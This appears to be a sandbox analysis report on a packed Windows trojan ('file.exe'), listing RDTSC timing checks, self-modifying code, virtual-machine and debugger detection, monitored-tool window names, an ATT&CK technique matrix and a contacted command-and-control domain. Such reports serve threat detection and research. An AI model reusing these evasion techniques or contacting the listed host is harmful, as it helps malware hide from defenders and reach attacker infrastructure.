Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC165 second address: 7FC17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F66E8838CE6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F66E8838CE6h 0x00000013 jnc 00007F66E8838CE6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC17E second address: 7FC18C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC18C second address: 7FC192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC192 second address: 7FC1A1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F66E8C719DAh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC1A1 second address: 7FC1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8838CF0h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jno 00007F66E8838CE6h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC1C6 second address: 7FC1CB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC309 second address: 7FC318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jbe 00007F66E8838CE6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC318 second address: 7FC31E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC31E second address: 7FC349 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F66E8838CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F66E8838CEAh 0x00000011 jmp 00007F66E8838CF5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC349 second address: 7FC34D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC66F second address: 7FC67D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F66E8838CE8h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FCE1A second address: 7FCE1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD4C6 second address: 7FD4CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD4CA second address: 7FD505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8C719E5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d ja 00007F66E8C719D6h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop esi 0x00000016 push esi 0x00000017 jmp 00007F66E8C719E2h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB279 second address: 7FB28A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F66E8838CE6h 0x0000000b pop esi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB28A second address: 7FB290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802E23 second address: 802E63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F66E8838CEEh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jns 00007F66E8838CEEh 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802E63 second address: 802E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802E67 second address: 802E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805DD9 second address: 805DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805DDD second address: 805DE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805826 second address: 80582F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80582F second address: 805833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8106B2 second address: 8106B8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81382D second address: 813837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F66E8838CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813837 second address: 81383B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81383B second address: 813844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813844 second address: 81384C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81384C second address: 81386A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F66E8838CE6h 0x0000000a pop ecx 0x0000000b popad 0x0000000c push ebx 0x0000000d jnl 00007F66E8838CECh 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815F17 second address: 815F1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815F1F second address: 815F25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815F25 second address: 815F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8206CD second address: 8206ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F66E8838CF8h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8206ED second address: 8206F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8206F1 second address: 820705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8838CEEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 829A78 second address: 829A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jbe 00007F66E8C719D6h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82C684 second address: 82C68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83292A second address: 832930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 832930 second address: 832951 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F66E8838CEAh 0x0000000c jmp 00007F66E8838CEAh 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8313E2 second address: 8313E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8313E7 second address: 831419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 jmp 00007F66E8838CEBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 jnp 00007F66E8838CE6h 0x0000001b popad 0x0000001c jmp 00007F66E8838CF0h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831419 second address: 831420 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831420 second address: 831428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83191C second address: 831922 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831922 second address: 831928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831AAF second address: 831AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831AB7 second address: 831ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831C0B second address: 831C1F instructions: 0x00000000 rdtsc 0x00000002 js 00007F66E8C719D6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F66E8C719DEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 835FD9 second address: 835FDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 836159 second address: 836169 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F66E8C719D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 836169 second address: 83616D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83616D second address: 836173 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 836173 second address: 836179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 836179 second address: 83617D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83AC02 second address: 83AC06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83AC06 second address: 83AC10 instructions: 0x00000000 rdtsc 0x00000002 je 00007F66E8C719D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84138E second address: 8413A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F66E8838CF1h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84852E second address: 848532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848532 second address: 84853A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84853A second address: 848540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848540 second address: 848544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844220 second address: 844224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844224 second address: 84424B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8838CF9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F66E8838CF2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84424B second address: 844251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85576D second address: 855784 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CF2h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 855784 second address: 855796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jl 00007F66E8C719E0h 0x0000000d push ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85548B second address: 8554AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F66E8838CE6h 0x0000000e jmp 00007F66E8838CF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8554AF second address: 8554B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B794 second address: 86B79E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B79E second address: 86B7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B7A2 second address: 86B7A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A995 second address: 86A9B5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F66E8C719E2h 0x00000008 jg 00007F66E8C719D6h 0x0000000e je 00007F66E8C719D6h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push ecx 0x00000017 pushad 0x00000018 jne 00007F66E8C719D6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E476 second address: 86E47C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E47C second address: 86E492 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F66E8C719D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E492 second address: 86E4A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871399 second address: 8713B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8C719E9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870FB9 second address: 870FCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CEFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872E20 second address: 872E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F66E8C719DCh 0x0000000b popad 0x0000000c rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5DC8ED instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 77CFCE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5DC7E9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 80889C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6300Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: file.exe, file.exe, 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000001.00000002.1446968605.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1401010991.00000000010E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
Source: file.exe, 00000001.00000003.1401010991.0000000001117000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1407874228.0000000001119000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1446968605.000000000111A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: file.exe, 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
Source: C:\Users\user\Desktop\file.exeFile opened: SICE
Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005BDF70 LdrInitializeThunk,1_2_005BDF70
Source: file.exe, file.exe, 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: C}aProgram Manager
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping631
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)4
Obfuscated Files or Information		Security Account Manager2
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive13
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Software Packing		NTDS223
System Information Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
file.exe42%ReversingLabsWin32.Trojan.Symmi
file.exe51%VirustotalBrowse
file.exe100%AviraTR/Crypt.TPM.Gen
file.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://property-imper.sbs/api60%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
property-imper.sbs
104.21.33.116
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://property-imper.sbs/apifalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://property-imper.sbs/api6file.exe, 00000001.00000002.1447078609.000000000116F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1401010991.0000000001117000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1402955652.000000000116D000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://property-imper.sbs/file.exe, 00000001.00000003.1401010991.0000000001117000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1407874228.0000000001119000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1402955652.000000000116D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1446968605.000000000111A000.00000004.00000020.00020000.00000000.sdmpfalse
        		high

